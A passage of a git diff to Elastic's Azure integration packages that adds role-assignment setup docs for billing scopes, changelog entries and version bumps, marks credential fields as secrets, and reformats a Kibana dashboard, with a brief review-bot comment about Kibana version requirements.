(IAM)**. 
@@ -90,10 +94,34 @@ Take note of the content in the **Value** column in the **Client secrets** table 1. Click the **Select** button. 1. Then click the **Review + assign** button. +You can use the department scope (EA accounts only) or the billing account scope (EA and MCA accounts) to collect billing metrics from multiple subscriptions. + +To collect billing metrics from a department (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Billing** > **Departments** and select the department you're interested in. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Department reader**. +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + +To collect billing metrics from a billing account (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Billing account reader** (view-only access). +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + Take note of the following values, which you will use later when specifying settings. -* `Subscription ID`: use the content of the "Subscription ID" you selected. -* `Tenant ID`: use the "Tenant ID" from the Azure Active Directory you use. +* `Tenant ID`: use the "Tenant ID" from your Microsoft Entra ID. +* Only one of the following: + * `Subscription ID`: use the "Subscription Id" content if you decide to collect metrics from a subscription. + * `Department Id`: use the "Department Id" content if you decide to collect metrics from a department. 
+ * `Billing account ID`: use the "Billing account ID" content if you decide to collect metrics from a billing account. Your App Registration is now ready for the Elastic Agent. diff --git a/packages/azure_billing/changelog.yml b/packages/azure_billing/changelog.yml index bce5c4f018f..ad93c772206 100644 --- a/packages/azure_billing/changelog.yml +++ b/packages/azure_billing/changelog.yml @@ -1,3 +1,23 @@ +- version: 1.5.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.4.2 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.4.1 + changes: + - description: Add documentation for assigning roles for department and billing account scopes. + type: enhancement + link: https://github.com/elastic/integrations/pull/9105 +- version: 1.4.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.3.2 changes: - description: Fix missing reference for filter in dashboard. diff --git a/packages/azure_billing/docs/README.md b/packages/azure_billing/docs/README.md index 2788893ce36..222fc0b84e7 100644 --- a/packages/azure_billing/docs/README.md +++ b/packages/azure_billing/docs/README.md 
@@ -19,7 +19,7 @@ Usage details metrics track actual expenses including details like subscription To use this integration you will need: -* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires the Billing Reader role to access the billing information for the subscription, department, or billing account. See more details in the [Setup section](#setup). +* **Azure App Registration**: You need to set up an Azure App Registration to allow the Agent to access the Azure APIs. The App Registration requires a role to access the billing information. The required role is different depending on the subscription, department, or billing account scope. Check the [Setup section](#setup) for more details. * **Elasticsearch and Kibana**: You need Elasticsearch to store and search your data and Kibana to visualize and manage it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, the [Native Azure Integration](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.elasticsearch?tab=Overview), or self-manage the Elastic Stack on your hardware. * **Payment method**: Azure Billing Metrics integration queries are charged based on the number of standard API calls. One integration makes two calls every 24 hours in the standard configuration. @@ -79,6 +79,10 @@ Take note of the content in the **Value** column in the **Client secrets** table #### Assign role +Assign a role to the App Registration depending on the scope you're interested in. + +To collect billing metrics from a single subscription, assign the **Billing Reader** to the App Registration on that subscription: + 1. In the [Azure Portal](https://portal.azure.com/), search for and select **Subscriptions**. 1. Select the subscription to assign the application. 1. Select **Access control (IAM)**. 
@@ -90,10 +94,34 @@ Take note of the content in the **Value** column in the **Client secrets** table 1. Click the **Select** button. 1. Then click the **Review + assign** button. +You can use the department scope (EA accounts only) or the billing account scope (EA and MCA accounts) to collect billing metrics from multiple subscriptions. + +To collect billing metrics from a department (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Billing** > **Departments** and select the department you're interested in. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Department reader**. +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + +To collect billing metrics from a billing account (instead of a subscription): + +1. In the [Azure Portal](https://portal.azure.com/), search for and select **Cost Management + Billing**. +1. Select **Access control (IAM)**. +1. Select **Add**. +1. In the **Add role assignment** panel, select the role **Billing account reader** (view-only access). +1. In the **Users, groups, or apps** search box, type the name of the App Registration you created and select it. +1. Click on the **Add** button. + Take note of the following values, which you will use later when specifying settings. -* `Subscription ID`: use the content of the "Subscription ID" you selected. -* `Tenant ID`: use the "Tenant ID" from the Azure Active Directory you use. +* `Tenant ID`: use the "Tenant ID" from your Microsoft Entra ID. +* Only one of the following: + * `Subscription ID`: use the "Subscription Id" content if you decide to collect metrics from a subscription. + * `Department Id`: use the "Department Id" content if you decide to collect metrics from a department. 
+ * `Billing account ID`: use the "Billing account ID" content if you decide to collect metrics from a billing account. Your App Registration is now ready for the Elastic Agent. diff --git a/packages/azure_billing/manifest.yml b/packages/azure_billing/manifest.yml index 4967b2d61f9..04fd60f7678 100644 --- a/packages/azure_billing/manifest.yml +++ b/packages/azure_billing/manifest.yml @@ -1,6 +1,6 @@ name: azure_billing title: Azure Billing Metrics -version: "1.3.2" +version: "1.5.0" description: Collect billing metrics with Elastic Agent. type: integration icons: @@ -13,13 +13,13 @@ screenshots: title: App State Overview size: 5120x2562 type: image/png -format_version: "3.0.0" +format_version: "3.0.2" categories: - observability - azure conditions: kibana: - version: "^8.3.0" + version: "^8.12.0" elastic: subscription: "basic" vars: @@ -31,8 +31,9 @@ vars: required: true show_user: true - name: client_secret - type: text + type: password title: Client Secret + secret: true description: The secret key of the App Registration. multi: false required: true diff --git a/packages/azure_blob_storage/changelog.yml b/packages/azure_blob_storage/changelog.yml index 3b96289e39b..e7c2b03c646 100644 --- a/packages/azure_blob_storage/changelog.yml +++ b/packages/azure_blob_storage/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/azure_blob_storage/manifest.yml b/packages/azure_blob_storage/manifest.yml index 620746f4422..cec9a20ddd4 100644 --- a/packages/azure_blob_storage/manifest.yml +++ b/packages/azure_blob_storage/manifest.yml 
@@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_blob_storage title: Custom Azure Blob Storage Input description: Collect JSON data from configured Azure Blob Storage Container with Elastic Agent. type: integration -version: "1.0.1" +version: "1.1.0" conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" categories: - custom - cloud @@ -27,12 +27,13 @@ policy_templates: required: true show_user: true - name: service_account_key - type: text + type: password title: Service Account Key description: | This attribute contains the access key, found under the Access keys section on Azure Cloud, under the respective storage account. A single storage account can contain multiple containers, and they will all use this common access key. required: false show_user: true + secret: true - name: service_account_uri type: text title: Service Account URI diff --git a/packages/azure_frontdoor/changelog.yml b/packages/azure_frontdoor/changelog.yml index f7827fb9136..95c4f7a0305 100644 --- a/packages/azure_frontdoor/changelog.yml +++ b/packages/azure_frontdoor/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.7.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.6.1" changes: - description: Changed owners diff --git a/packages/azure_frontdoor/manifest.yml b/packages/azure_frontdoor/manifest.yml index 88d54c82992..34427459aaa 100644 --- a/packages/azure_frontdoor/manifest.yml +++ b/packages/azure_frontdoor/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: azure_frontdoor title: "Azure Frontdoor" -version: "1.6.1" +version: "1.7.0" description: "This Elastic integration collects logs from Azure Frontdoor." type: integration categories: @@ -11,7 +11,7 @@ categories: - web conditions: kibana: - version: "^8.6.0" + version: "^8.12.0" screenshots: - src: /img/azure-frontdoor-overview.png title: Azure Frontdoor Overview 
@@ -57,11 +57,12 @@ policy_templates: required: true show_user: true - name: storage_account_key - type: text + type: password title: Storage Account Key multi: false required: true show_user: true + secret: true - name: resource_manager_endpoint type: text title: Resource Manager Endpoint diff --git a/packages/azure_functions/changelog.yml b/packages/azure_functions/changelog.yml index 032c6388a9a..905389c11a8 100644 --- a/packages/azure_functions/changelog.yml +++ b/packages/azure_functions/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: 0.4.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 0.3.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 0.3.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "0.2.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: 0.2.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/azure_functions/data_stream/functionapplogs/manifest.yml b/packages/azure_functions/data_stream/functionapplogs/manifest.yml index 757eec822bd..58644692675 100644 --- a/packages/azure_functions/data_stream/functionapplogs/manifest.yml +++ b/packages/azure_functions/data_stream/functionapplogs/manifest.yml @@ -25,6 +25,7 @@ streams: - name: connection_string type: password title: Connection String + secret: true multi: false required: true show_user: true 
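Review bot: The functionapplogs `@@ -25,6 +25,7 @@` hunk adds `secret: true` to a data-stream variable, but the package-level packages/azure_functions/manifest.yml is not in this chunk, so I cannot see whether its `conditions.kibana.version` was raised to `^8.12.0` the way every other package in this diff does; the azure_functions changelog entries for 0.3.1 and 0.4.0 say secrets were disabled precisely because older stacks errored on them. The same check applies to the `@@ -41,6 +42,7 @@` and metrics `@@ -14,8 +14,9 @@` hunks that follow. The enclosing `streams` list begins before each of these hunks.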
@@ -41,6 +42,7 @@ streams: - name: storage_account_key type: password title: Storage Account Key + secret: true multi: false required: true show_user: true diff --git a/packages/azure_functions/data_stream/metrics/manifest.yml b/packages/azure_functions/data_stream/metrics/manifest.yml index c3dd002f4ae..3a924c18ed0 100644 --- a/packages/azure_functions/data_stream/metrics/manifest.yml +++ b/packages/azure_functions/data_stream/metrics/manifest.yml @@ -14,8 +14,9 @@ streams: required: true show_user: true - name: client_secret - type: text + type: password title: Client Secret + secret: true multi: false required: true show_user: true diff --git a/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json b/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json index 8789e027f33..c32950ad070 100644 --- a/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json +++ b/packages/azure_functions/kibana/dashboard/azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b.json 
@@ -1,2317 +1,2461 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\",\"fieldName\":\"azure.resource.name\",\"title\":\"Filter by Function App\",\"enhancements\":{},\"selectedOptions\":[]}},\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\",\"fieldName\":\"azure.resource.group\",\"title\":\"Filter by resource group\",\"enhancements\":{}}}}" - }, - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T16:40:02.986Z", + "created_at": "2023-11-07T16:40:02.986Z", + "version": "WzkyLDFd", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ff8243f3-9c96-4cb0-b703-0af0107bc8f7\",\"fieldName\":\"azure.resource.name\",\"title\":\"Filter by Function 
App\",\"enhancements\":{},\"selectedOptions\":[]}},\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":false,\"width\":\"medium\",\"explicitInput\":{\"id\":\"bebd2bf5-eb88-4157-b86b-e6fd9e322b13\",\"fieldName\":\"azure.resource.group\",\"title\":\"Filter by resource group\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f6c3c469-2e64-4120-b144-997fb70575e2": { + "columnOrder": [ + "b0f015a9-aab1-4b26-b28f-65ce55f354de" + ], + "columns": { + "b0f015a9-aab1-4b26-b28f-65ce55f354de": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Active Function Apps", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {} + } + } + }, + "textBased": { + "layers": {} } - } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "f6c3c469-2e64-4120-b144-997fb70575e2", + "layerType": "data", + "metricAccessor": "b0f015a9-aab1-4b26-b28f-65ce55f354de", + "showBar": false + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": 
true + "gridData": { + "h": 6, + "i": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", + "w": 10, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f6c3c469-2e64-4120-b144-997fb70575e2": { - "columnOrder": [ - "b0f015a9-aab1-4b26-b28f-65ce55f354de" - ], - "columns": { - "b0f015a9-aab1-4b26-b28f-65ce55f354de": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Active Function Apps", - "operationType": "unique_count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {} - } - } - }, - "textBased": { - "layers": {} - } + "panelIndex": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", + "title": "Number of Active Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "Health Check Status indicates if there are any unhealthy instances and if they need replacing. A value of 100 means all instances of the App reported a healthy status. 
", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "60014cf3-d9b4-46e8-ae69-999d31086fbc", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "113434b9-c581-4b79-9344-13864154c598": { + "columnOrder": [ + "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", + "8952901b-a1b3-4bb5-9605-c68a31cef340", + "6439d7ec-458f-4daf-a97a-101e6f025660" + ], + "columns": { + "6439d7ec-458f-4daf-a97a-101e6f025660": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.functions.health_check_status.avg: *" + }, + "isBucketed": false, + "label": "ExecutionCount", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.function_execution_count.total" + }, + "68c19ae2-0676-4b4a-90e7-c60d2ca556ac": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6439d7ec-458f-4daf-a97a-101e6f025660", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layerId": "f6c3c469-2e64-4120-b144-997fb70575e2", - "layerType": "data", - "metricAccessor": "b0f015a9-aab1-4b26-b28f-65ce55f354de", - "showBar": false - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", 
- "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0", - "title": "Number of Active Function Apps", - "type": "lens", - "version": "8.7.1" + "8952901b-a1b3-4bb5-9605-c68a31cef340": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": "azure.functions.health_check_status.avg: *", + "disabled": false, + "index": "60014cf3-d9b4-46e8-ae69-999d31086fbc", + "key": "query", + "negate": false, + "type": "custom", + "value": "{\"bool\":{\"filter\":[{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"exists\":{\"field\":\"azure.functions.health_check_status.avg\"}}]}}],\"must\":[],\"must_not\":[],\"should\":[]}}" + }, + "query": { + "bool": { + "filter": [ + { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "exists": { + "field": "azure.functions.health_check_status.avg" + } + } + ] + } + } + ], + "must": [], + "must_not": [], + "should": [] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6439d7ec-458f-4daf-a97a-101e6f025660" + ], + "layerId": "113434b9-c581-4b79-9344-13864154c598", + "layerType": "data", + "seriesType": "line", + "splitAccessor": "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", + "xAccessor": "8952901b-a1b3-4bb5-9605-c68a31cef340" + } + ], + "legend": { + 
"isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "Health Check Status indicates if there are any unhealthy instances and if they need replacing. A value of 100 means all instances of the App reported a healthy status. ", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "Captures the number of execution of the function app. ", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b9d5606f-9607-4c90-a75f-c2857b266bfa", + "w": 15, + "x": 10, + "y": 0 + }, + "panelIndex": "b9d5606f-9607-4c90-a75f-c2857b266bfa", + "title": "Function Execution Count by Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8e323fe9-19c2-405d-bbf6-ba61dc9a190f": { + "columnOrder": [ + "c4d0be17-9d74-468d-8e55-a064664300d1", + "2cbcc3e5-5848-4a88-910b-7c845618ae2e", + "b37bb938-9515-453c-a5ff-f384a7351317", + "b37bb938-9515-453c-a5ff-f384a7351317X1", + "b37bb938-9515-453c-a5ff-f384a7351317X0", + "b37bb938-9515-453c-a5ff-f384a7351317X2" + ], + "columns": { + "2cbcc3e5-5848-4a88-910b-7c845618ae2e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total number of invocations", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "azure.functions.requests.total" + }, + 
"b37bb938-9515-453c-a5ff-f384a7351317": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Success Percentage", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "60014cf3-d9b4-46e8-ae69-999d31086fbc", - "type": "index-pattern" + "formula": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", + "isFormulaBroken": false + }, + "references": [ + "b37bb938-9515-453c-a5ff-f384a7351317X2" + ], + "scale": "ratio" + }, + "b37bb938-9515-453c-a5ff-f384a7351317X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Success Percentage", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "azure.functions.http2xx.total" + }, + "b37bb938-9515-453c-a5ff-f384a7351317X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Success Percentage", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "azure.functions.requests.total" + }, + "b37bb938-9515-453c-a5ff-f384a7351317X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Success Percentage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "b37bb938-9515-453c-a5ff-f384a7351317X0", + "b37bb938-9515-453c-a5ff-f384a7351317X1" + ], + "location": { + "max": 73, + "min": 0 + }, + "name": "divide", + "text": "sum(azure.functions.http2xx.total) / sum(azure.functions.requests.total) ", + "type": "function" } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "113434b9-c581-4b79-9344-13864154c598": { - "columnOrder": [ - "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", - "8952901b-a1b3-4bb5-9605-c68a31cef340", - "6439d7ec-458f-4daf-a97a-101e6f025660" - ], - "columns": { - 
"6439d7ec-458f-4daf-a97a-101e6f025660": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "azure.functions.health_check_status.avg: *" - }, - "isBucketed": false, - "label": "ExecutionCount", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.function_execution_count.total" - }, - "68c19ae2-0676-4b4a-90e7-c60d2ca556ac": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "6439d7ec-458f-4daf-a97a-101e6f025660", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "8952901b-a1b3-4bb5-9605-c68a31cef340": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "references": [ + "b37bb938-9515-453c-a5ff-f384a7351317X0", + "b37bb938-9515-453c-a5ff-f384a7351317X1" + ], + "scale": "ratio" + }, + "c4d0be17-9d74-468d-8e55-a064664300d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top 10 Function Apps", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": 
"azure.functions.health_check_status.avg: *", - "disabled": false, - "index": "60014cf3-d9b4-46e8-ae69-999d31086fbc", - "key": "query", - "negate": false, - "type": "custom", - "value": "{\"bool\":{\"filter\":[{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"exists\":{\"field\":\"azure.functions.health_check_status.avg\"}}]}}],\"must\":[],\"must_not\":[],\"should\":[]}}" - }, - "query": { - "bool": { - "filter": [ - { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "exists": { - "field": "azure.functions.health_check_status.avg" - } - } - ] - } - } - ], - "must": [], - "must_not": [], - "should": [] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "6439d7ec-458f-4daf-a97a-101e6f025660" - ], - "layerId": "113434b9-c581-4b79-9344-13864154c598", - "layerType": "data", - "seriesType": "line", - "splitAccessor": "68c19ae2-0676-4b4a-90e7-c60d2ca556ac", - "xAccessor": "8952901b-a1b3-4bb5-9605-c68a31cef340" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + 
"columns": [ + { + "columnId": "c4d0be17-9d74-468d-8e55-a064664300d1", + "isTransposed": false + }, + { + "alignment": "left", + "colorMode": "cell", + "columnId": "2cbcc3e5-5848-4a88-910b-7c845618ae2e", + "isTransposed": false, + "palette": { + "name": "positive", + "params": { + "stops": [ + { + "color": "#d6e9e4", + "stop": 20 + }, + { + "color": "#aed3ca", + "stop": 40 + }, + { + "color": "#85bdb1", + "stop": 60 + }, + { + "color": "#5aa898", + "stop": 80 + }, + { + "color": "#209280", + "stop": 100 + } + ] + }, + "type": "palette" }, - "description": "Captures the number of execution of the function app. ", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "b9d5606f-9607-4c90-a75f-c2857b266bfa", - "w": 15, - "x": 10, - "y": 0 - }, - "panelIndex": "b9d5606f-9607-4c90-a75f-c2857b266bfa", - "title": "Function Execution Count by Function Apps", - "type": "lens", - "version": "8.7.1" + "summaryRow": "none" + }, + { + "alignment": "left", + "columnId": "b37bb938-9515-453c-a5ff-f384a7351317", + "isTransposed": false + } + ], + "layerId": "8e323fe9-19c2-405d-bbf6-ba61dc9a190f", + "layerType": "data" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8e323fe9-19c2-405d-bbf6-ba61dc9a190f": { - "columnOrder": [ - "c4d0be17-9d74-468d-8e55-a064664300d1", - "2cbcc3e5-5848-4a88-910b-7c845618ae2e", - 